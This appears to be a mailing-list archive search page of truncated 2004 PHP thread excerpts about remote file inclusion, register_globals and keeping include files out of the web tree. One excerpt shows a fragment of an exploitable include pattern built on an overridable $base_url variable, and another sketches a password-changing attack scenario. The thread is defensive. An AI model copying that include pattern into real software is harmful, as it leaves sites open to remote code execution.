On Tuesday 14 December 2004 03:11, Richard Lynch wrote:
> If they can't run with register_globals OFF, they don't get installed.
Even if they are advertised to run with register_globals disabled, I hope you
check that they don't cheat and do something cheesy like extract($_REQUEST).
;-)
--
Ja
KJ wrote:
> OK, I don't think you've read my posts in much detail at all. I looks as
> though you have skimmed over them and got a pre-determined idea of my
> issue in your head.
>
> Not once have I mentioned anything about "customers" in my posts. I'm
> not a web host. I'm not talking about people
KJ wrote:
>> So, not only do you have register_globals "on" which is a Bad Idea,
>> you've
>> got PHP files in your web tree that they can surf to, bypass your
>> configuration setting of $base_url, and execute code that the Programmer
>> never ever ever intended to be executed out of sequence (IE,
KJ wrote:
> Ah OK. So the only only includes should be out of the web tree, or on a
> remote site?
>
> Nice one.
I hope you're not being sarcastic, because this statement is actually 100%
true.
Your web-sites should have clearly-defined 'entry points' which are pages
that you actually expect peop
Ah OK. So the only only includes should be out of the web tree, or on a
remote site?
Nice one.
Mike Ford wrote:
To view the terms under which this email is distributed, please go to
http://disclaimer.leedsmet.ac.uk/email.htm
On 10 December 2004 22:07, Richard Lynch wrote:
This is a MUCH BIGGER
To view the terms under which this email is distributed, please go to
http://disclaimer.leedsmet.ac.uk/email.htm
On 10 December 2004 22:07, Richard Lynch wrote:
> This is a MUCH BIGGER PROBLEM than remote include working or not.
>
> You've *GOT* to get those files *OUT* of the web-tree.
>
>
Greg Donald wrote:
On Fri, 10 Dec 2004 22:00:43 +, KJ <[EMAIL PROTECTED]> wrote:
5. Joe Hacker has studied the script coz he's a tart that wants to piss
people off and he has found a vunerability.
6. Joe Hacker uses the vunerability to change your account passwd. He
then logs in as you and del
On Fri, 10 Dec 2004 22:00:43 +, KJ <[EMAIL PROTECTED]> wrote:
> Let me try to paint another simple senario:
>
> 1. You have a shared hosting account with example.com hosted on it.
> 2. You want a guestbook setup on it, and you've found one that you like.
> 3. You install "phpMyFantasticGuestbo
Richard Lynch wrote:
Now in each instance register globals was on and all that was needed to
You should turn register_globals off, first of all.
True, ideally register globals should be off.
Secondly, something is very very very wrong in your analysis.
No it isn't.
If this line of code gets execute
KJ wrote:
> OK, apologies on my part, I did not correctly explian the problem which
> can and has arisen from remote includes.
>
> I'll try to explain the problem that I have come across twice in the
> last couple of years both with popular software packages that I
> downloaded like thousands of ot
OK, I don't think you've read my posts in much detail at all. I looks as
though you have skimmed over them and got a pre-determined idea of my
issue in your head.
Not once have I mentioned anything about "customers" in my posts. I'm
not a web host. I'm not talking about people who have access t
KJ wrote:
>>
>> Basically this particular case boils down to: "files that are included
>> and
>> should not a be called directly" should not be allowed to be called
>> directly.
>>
>> You can do this at the application level whereby each included file
>> checks
>> whether it was called directly and
Basically this particular case boils down to: "files that are included and
should not a be called directly" should not be allowed to be called directly.
You can do this at the application level whereby each included file checks
whether it was called directly and refuse to run when that is so.
O
On Friday 10 December 2004 06:05, KJ wrote:
> The vunerability occurred where both applications had a variable setting
> a base directory of the source code, which was used when including files
> throughout the application, i.e.:
>
> $base_url = '/home/example.com/www';
> include_once ($base_url.'
OK, apologies on my part, I did not correctly explian the problem which
can and has arisen from remote includes.
I'll try to explain the problem that I have come across twice in the
last couple of years both with popular software packages that I
downloaded like thousands of others and both with
Kelvin Jones wrote:
> I would like to see a new directive to go alongside "allow_url_fopen" to
> allow people to turn on or off the ability to include/require a remote
> file.
>
> The ability to include and execute a file as php from a remote host
> leaves many applications open to cross-site-scrip
16 matches
Mail list logo
